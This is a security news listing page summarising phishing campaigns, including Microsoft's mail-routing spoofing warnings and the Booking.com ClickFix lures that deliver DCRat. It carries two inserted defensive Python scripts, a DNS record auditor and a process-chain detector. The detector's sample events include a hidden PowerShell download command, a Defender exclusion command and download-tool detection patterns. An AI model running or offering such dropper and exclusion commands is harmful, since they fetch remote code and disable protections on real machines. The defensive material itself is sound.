ciso brief

All news with #phishing tag

615 articles · page 16 of 31

Instagram Denies Breach After 17M Account Data Leak Claims

🔐 Meta says it patched a bug that allowed an external party to mass-request Instagram password reset emails and denies any systems breach after claims that data from more than 17 million accounts was posted online. Malwarebytes warned customers of a 17.5M-account dump containing phone numbers, emails, addresses and Instagram IDs, though not every record includes all fields. Meta told reporters it is not aware of an API incident in 2022 or 2024, and Instagram accounts remain secure. Users should ignore unsolicited reset emails, enable two-factor authentication, and stay alert to phishing and smishing attempts.

APT28 Credential Harvesting Hits Energy, Think Tanks

🔒 Recorded Future links GRU-affiliated APT28 (aka BlueDelta) to targeted credential-harvesting campaigns in 2025 that hit staff at a Turkish energy and nuclear research agency, a European think tank, and entities in North Macedonia and Uzbekistan. The group used regionally tailored Turkish-language lures and legitimate PDF decoys, and deployed spoofed OWA, Google and Sophos VPN login pages hosted on services such as Webhook.site, InfinityFree, Byet and ngrok; after capturing credentials the pages redirected victims to the real sites so the theft went unnoticed.

Phishing Click Rates Mislead; Focus on Containment

🔐 Many security teams rely on click rates to judge phishing risk, but that metric is volatile and often fails to predict real-world harm. The article argues that true maturity is measured by what an attacker can do after gaining mailbox access, not by simulated click statistics. It urges a layered approach—prevention, detection, and especially containment—and highlights Material Security as an example of automated remediation that reduces blast radius without constant manual triage.

Illinois Man Charged for Phishing Snapchat Accounts

🔒 U.S. prosecutors charged an Illinois man with running a phishing operation that targeted nearly 600 women’s Snapchat accounts between May 2020 and February 2021. Kyle Svara allegedly used social engineering to collect emails, phone numbers, and usernames, then impersonated Snap representatives to request access codes and harvest credentials, ultimately accessing at least 59 accounts and downloading private images. He is accused of advertising hacking services on Reddit, directing accomplices to encrypted channels such as Kik, and selling or trading stolen content. Svara faces federal counts including aggravated identity theft, wire fraud, computer fraud, and making false statements related to child pornography, and is scheduled to appear in Boston federal court on February 4.

WhatsApp Worm Deploys Astaroth Banking Trojan in Brazil

📱 Acronis says a campaign named Boto Cor-de-Rosa uses WhatsApp to spread the Astaroth banking trojan in Brazil. Attackers distribute ZIP archives via messages; when the victim extracts and opens the contents, a Visual Basic Script runs and downloads additional components and an MSI installer. A Python-based worm module harvests WhatsApp contacts and automatically forwards the malicious archives to propagate. A background banking module monitors browsing to harvest credentials, and the malware logs propagation metrics.

Phishing attackers exploit email routing and spoofing gaps

📧 Microsoft Threat Intelligence warns attackers are increasingly abusing complex email routing and misconfigured DMARC and SPF policies to make phishing messages appear internal. Campaigns exploit MX records that do not point directly to Microsoft 365, allowing messages with the recipient's address in both To and From fields to bypass filters. Lures include password resets and shared-document notices, and some attacks use Phishing-as-a-Service platforms such as Tycoon 2FA to perform Adversary-in-the-Middle attacks that can defeat MFA. Microsoft recommends strict DMARC reject policies, SPF hard-fails, correct connector configuration, and phishing-resistant MFA like FIDO2.

Phishing Exploits Misconfigured MX Records in M365 Now

📧 Microsoft Threat Intelligence warns of a surge in phishing campaigns that exploit misconfigured mail routing and domain spoofing protections to make malicious messages appear internal to Microsoft 365 tenants. Attackers target users with HR- and IT-themed lures to steal credentials, often pairing the technique with phishing-as-a-service kits like Tycoon 2FA. The vector depends on tenants whose MX records are not pointed directly at Microsoft 365, which bypasses the built-in spoof detection. Organizations should correct MX configuration, enforce DMARC and deploy phishing-resistant MFA for privileged roles.

AI-Powered 'Truman Show' Investment Scam Exposed Globally

🕵️ The OPCOPRO "Truman Show" operation is a sophisticated, fully synthetic investment scam that relies on social engineering rather than malware. Attackers use legitimate Android and iOS apps from official stores as WebView shells and build AI-generated communities to cultivate trust. Victims are lured via phishing SMS, ads, and Telegram into tightly controlled WhatsApp and Telegram groups where AI-generated "experts" and synthetic peers simulate an institutional-grade trading environment for weeks before requesting money or personal data.

Microsoft Alerts: Phishing Uses Email Routing and DMARC Gaps

📧 Microsoft’s Threat Intelligence team warns that attackers are increasingly exploiting complex email routing and misconfigured DMARC and SPF policies to make phishing messages appear to come from inside targeted organizations. These campaigns often rely on MX records that route mail through on‑premises servers or third‑party relays before Microsoft 365, which can prevent correct spoof checks. Threat actors deliver lures ranging from password resets to shared documents and use PhaaS platforms such as Tycoon 2FA. Microsoft advises enforcing strict DMARC reject and SPF hard-fail policies, verifying connectors, and adopting phishing-resistant MFA like FIDO2 keys.

Misconfigured Email Routing Enables Internal Domain Phishing

🔒 Microsoft warns that threat actors are exploiting misconfigured email routing and lax spoof protections to send phishing messages that appear to originate from an organization’s own domain. The Microsoft Threat Intelligence team says the tactic surged since May 2025 and is commonly deployed via Tycoon 2FA phishing-as-a-service kits. Attacks aim to steal credentials, bypass MFA via AiTM techniques, and enable follow-on fraud or BEC, often using fake invoices, HR notices, or shared-document lures. Organizations should enforce DMARC reject and strict SPF policies, validate third-party connectors, and disable Direct Send if unnecessary.

Phishing Actors Exploit Complex Mail Routing and Spoofing

📧 Phishing actors are exploiting complex mail routing and misconfigured spoof protections to send messages that appear to originate internally, frequently using PhaaS platforms such as Tycoon 2FA. Microsoft observed increased use of this vector since May 2025, including nested redirect chains and AiTM techniques to harvest credentials. Tenants with MX records pointed directly at Microsoft 365 benefit from its built-in protections; others must enforce strict SPF hard-fail, DKIM signing and DMARC reject policies and correctly configure connectors to stop these spoofing campaigns.
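The five Microsoft items above all turn on the same three DNS records. As an added example (not Microsoft's guidance or tooling), the script below parses MX, SPF and DMARC record text for two constructed domains and reports the gaps the advisories name: an MX that does not land directly on Exchange Online, an SPF record that ends in ~all instead of -all, and a DMARC policy weaker than p=reject. The domain names and records are constructed; the Exchange Online MX suffix is the real EOP host suffix. It reads record text only, so it runs offline, and it does not check connector or Direct Send settings, which live in the tenant rather than in DNS.

```python
"""Audit MX, SPF and DMARC records for the gaps the Microsoft advisories describe.

Added example; not Microsoft's tooling. Record text is parsed directly, so it
runs offline; replace SAMPLE_DNS with real lookups (e.g. dnspython) to use it live.
"""
import re

# Exchange Online Protection MX host suffix; tenants whose MX points elsewhere
# route inbound mail through another hop before Microsoft 365.
EOP_MX_SUFFIX = ".mail.protection.outlook.com"

# Constructed sample DNS data for two hypothetical domains (not live lookups).
SAMPLE_DNS = {
    "weak.example": {
        "MX": ["mx.legacy-relay.example"],                          # relay in front of M365
        "TXT": ["v=spf1 include:spf.protection.outlook.com ~all"],  # softfail, not hard-fail
        "_dmarc.TXT": ["v=DMARC1; p=none; rua=mailto:dmarc@weak.example"],
    },
    "hardened.example": {
        "MX": ["hardened-example.mail.protection.outlook.com"],
        "TXT": ["v=spf1 include:spf.protection.outlook.com -all"],
        "_dmarc.TXT": ["v=DMARC1; p=reject; sp=reject; adkim=s; aspf=s; "
                       "rua=mailto:dmarc@hardened.example"],
    },
}


def parse_spf(txt_records):
    """Return (terms, all_qualifier) from the v=spf1 record, or (None, None)."""
    for rec in txt_records:
        if rec.lower().startswith("v=spf1"):
            terms = rec.split()[1:]
            qualifier = None
            for term in terms:
                m = re.fullmatch(r"([+\-~?]?)all", term, re.I)
                if m:
                    qualifier = m.group(1) or "+"   # bare 'all' means pass
            return terms, qualifier
    return None, None


def parse_dmarc(txt_records):
    """Return DMARC tags as a dict, or None if there is no v=DMARC1 record."""
    for rec in txt_records:
        if rec.lower().startswith("v=dmarc1"):
            tags = {}
            for part in rec.split(";"):
                if "=" in part:
                    key, val = part.split("=", 1)
                    tags[key.strip().lower()] = val.strip()
            return tags
    return None


def audit(records):
    """Return a list of findings for one domain's records (empty list = no gaps)."""
    findings = []
    mx = records.get("MX", [])
    if not mx:
        findings.append("no MX record")
    elif not all(host.lower().endswith(EOP_MX_SUFFIX) for host in mx):
        findings.append("MX does not point directly at Exchange Online: " + ", ".join(mx))

    terms, qualifier = parse_spf(records.get("TXT", []))
    if terms is None:
        findings.append("no SPF record")
    elif qualifier != "-":
        findings.append(f"SPF does not hard-fail (all qualifier {qualifier!r})")

    dmarc = parse_dmarc(records.get("_dmarc.TXT", []))
    if dmarc is None:
        findings.append("no DMARC record")
    else:
        policy = dmarc.get("p", "none").lower()
        if policy != "reject":
            findings.append(f"DMARC policy is p={policy}, not reject")
        if dmarc.get("sp", policy).lower() != "reject":
            findings.append("DMARC subdomain policy (sp) is not reject")
    return findings


def audit_all(dns):
    """Audit every domain in a {domain: records} mapping."""
    return {domain: audit(records) for domain, records in dns.items()}


if __name__ == "__main__":
    for domain, findings in audit_all(SAMPLE_DNS).items():
        print(domain, "->", findings or "OK")
```

Running it prints four findings for weak.example and OK for hardened.example. The subdomain check matters because sp defaults to p, so a p=none record with no sp leaves every subdomain open to the same spoofing.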

Holiday Season Malware Targets Hotels via Booking Lures

⚠️ Securonix researchers have identified a multi-stage malware campaign, tracked as PHALT#BLYX, that targets hospitality organizations during the holiday season. The attack begins with phishing emails impersonating Booking.com, using urgent, high‑value reservation charges to lure victims to a convincing clone site. Victims are coerced through fake CAPTCHA and simulated BSOD prompts to paste a PowerShell command that downloads a project file executed by MSBuild.exe, culminating in a heavily obfuscated DCRat remote access Trojan. Securonix advises staff training, strict handling of browser‑prompted commands and enhanced monitoring of trusted binaries and process behaviour.

Phishing Campaign Uses Fake Booking Emails to Deploy DCRat

📧 Securonix researchers uncovered PHALT#BLYX, a phishing campaign that uses ClickFix-style lures and counterfeit Booking.com reservation messages to trick hospitality staff into executing commands that pull and run remote code. The landing pages present a fake CAPTCHA then a staged blue screen of death that instructs victims to paste a command into the Windows Run dialog, triggering a PowerShell dropper. That dropper downloads an MSBuild project (v.proj) and invokes MSBuild.exe to configure Defender exclusions, persist in Startup, and retrieve the DCRat remote-access trojan.

ClickFix Campaign Uses Fake BSOD to Trick Hospitality Staff

🛑 This campaign impersonates Booking.com to redirect hospitality staff to a cloned site that triggers a full-screen fake Windows BSOD. The page instructs victims to paste and run a command that launches PowerShell, compiles a malicious .NET project via MSBuild.exe, and executes a loader. The payload adds Defender exclusions, triggers UAC prompts for elevation, and deploys DCRat (staxs.exe), which provides remote access and can drop additional tools such as cryptocurrency miners.
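The three PHALT#BLYX items above describe one chain: a command pasted into the Run dialog starts PowerShell with explorer.exe as its parent, the script adds a Defender exclusion, and a downloaded project file is handed to MSBuild.exe. As an added example (not Securonix's detection content), the script below runs parent/child and command-line checks over constructed Sysmon-style process-creation events and links each hit back to its ancestry. The command lines, paths and the 203.0.113.10 address are illustrative; the real lure's exact commands may differ, and a benign developer build is included to show what the rules leave alone.

```python
"""Flag the ClickFix -> PowerShell -> MSBuild.exe chain in process-creation telemetry.

Added example; not Securonix's detection content. Events, command lines, paths
and the 203.0.113.10 address are constructed for illustration.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed Sysmon EID 1 style events (not real campaign logs).
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    # Pasted into the Run dialog, so explorer.exe is the parent of PowerShell.
    ProcEvent(200, 100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell -w hidden -c "iwr http://203.0.113.10/v.proj -o $env:TEMP\\v.proj"'),
    ProcEvent(201, 200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell -c "Add-MpPreference -ExclusionPath $env:APPDATA"'),
    ProcEvent(202, 200, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
              r"MSBuild.exe C:\Users\staff\AppData\Local\Temp\v.proj"),
    # Benign developer build from a source tree, for contrast.
    ProcEvent(300, 1, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
              r"MSBuild.exe C:\src\app\app.csproj /t:Build"),
]

USER_WRITABLE = re.compile(r"\\(temp|appdata|public|downloads)\\", re.I)
DOWNLOAD_CMDLET = re.compile(r"\b(iwr|invoke-webrequest|downloadstring|downloadfile|curl|wget)\b", re.I)
DEFENDER_EXCLUSION = re.compile(r"add-mppreference.*-exclusion", re.I)


def image_name(path):
    """Lower-cased file name of an image path."""
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return [(pid, reason)] for events matching the chain's individual stages."""
    by_pid = {e.pid: e for e in events}
    alerts = []
    for e in events:
        name = image_name(e.image)
        parent = by_pid.get(e.ppid)
        pname = image_name(parent.image) if parent else ""
        if name == "powershell.exe" and pname == "explorer.exe" and DOWNLOAD_CMDLET.search(e.cmdline):
            alerts.append((e.pid, "PowerShell download launched from explorer.exe (Run dialog pattern)"))
        if name == "powershell.exe" and DEFENDER_EXCLUSION.search(e.cmdline):
            alerts.append((e.pid, "Defender exclusion added from PowerShell"))
        if name == "msbuild.exe" and (pname == "powershell.exe" or USER_WRITABLE.search(e.cmdline)):
            alerts.append((e.pid, "MSBuild.exe spawned by PowerShell or building from a user-writable path"))
    return alerts


def lineage(events, pid):
    """Return the pid chain from a process up to its oldest recorded ancestor."""
    by_pid = {e.pid: e for e in events}
    chain = []
    while pid in by_pid:
        chain.append(pid)
        pid = by_pid[pid].ppid
    return chain


if __name__ == "__main__":
    for pid, reason in detect(SAMPLE_EVENTS):
        print(pid, lineage(SAMPLE_EVENTS, pid), reason)
```

Each stage is scored on its own so a partial chain (say, MSBuild.exe building from %TEMP% with no PowerShell parent) still surfaces; the lineage helper is what lets an analyst tie three separate hits back to the single explorer.exe that started them.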

Cybercriminals Abuse Google Cloud to Send Phishing Emails

📧 Check Point disclosed a large-scale phishing campaign that abused Google Cloud Application Integration to send authentic-looking messages from noreply-application-integration@google[.]com, enabling attackers to bypass SPF and DMARC protections. The emails mimicked routine enterprise notifications to prompt clicks and redirected victims through Google Cloud storage to a fake CAPTCHA and a counterfeit Microsoft login page. Google has blocked the abuse and is implementing further mitigations.

LinkedIn Job Scams: Global Tactics and Local Impacts

🔎 This post summarizes a cross‑national pattern of LinkedIn job scams in which fake employers and recruiters extract money or credentials from prospective employees. Tactics vary by market: tech‑job baiting in India, referral‑style fraud in Kenya, fake formal roles in Mexico, and credential‑harvesting schemes in Nigeria. The author emphasizes these are employer‑side frauds and distinct from scams where attackers pose as employees to secure remote work.

Silver Fox Uses Tax Phishing to Deliver ValleyRAT in India

📧 Silver Fox is targeting Indian users with income tax-themed phishing emails that deliver the modular remote-access trojan ValleyRAT. The campaign uses decoy PDFs that redirect victims to a domain hosting a ZIP archive containing an NSIS installer which sideloads a rogue libexpat.dll alongside a legitimate thunder.exe. The loader disables Windows Update, performs anti-analysis checks, and injects the RAT into explorer.exe to establish persistent, low-noise access.

Fake Grubhub Emails Promise Tenfold Bitcoin Payout

💰 Fraudulent emails appearing to come from a Grubhub subdomain promised a tenfold bitcoin payout to recipients who transferred funds to a specified wallet, urging action within a 30-minute window. Messages were sent from addresses on b.grubhub.com and in some cases included recipients' names, increasing their apparent legitimacy. Grubhub says it isolated the issue, investigated the incident, and is taking steps to prevent recurrence; technical details remain undisclosed.

Trust Wallet Chrome Extension Compromise Drains Millions

🔒 Several users reported funds drained from the Trust Wallet Chrome extension after a compromised update (v2.68.0) released on December 24. Researchers found malicious, obfuscated code in a bundled file (4482.js) that exfiltrated seed phrases to api.metrics-trustwallet[.]com, and attackers also deployed a phishing site (fix-trustwallet[.]com) soliciting recovery seeds. Trust Wallet published a patched v2.69, urged users to disable or update the extension, and advised anyone with exposed seeds to move assets to new wallets and contact support.

Coordinated Fake Job Ads Target MENA Remote Workers

🔍 Group-IB has uncovered a coordinated campaign of professionally produced fake job ads targeting MENA remote workers, exploiting the region's shift to remote roles. Ads on Facebook, Instagram and TikTok impersonate banks, e-commerce platforms and government bodies, then move conversations to WhatsApp and Telegram to harvest personal and financial data. Scammers promise quick earnings, use localized language and currencies, and reuse scripts and fake sites to scale and evade detection. Individuals are advised to verify employers, avoid sharing sensitive information and report suspicious listings.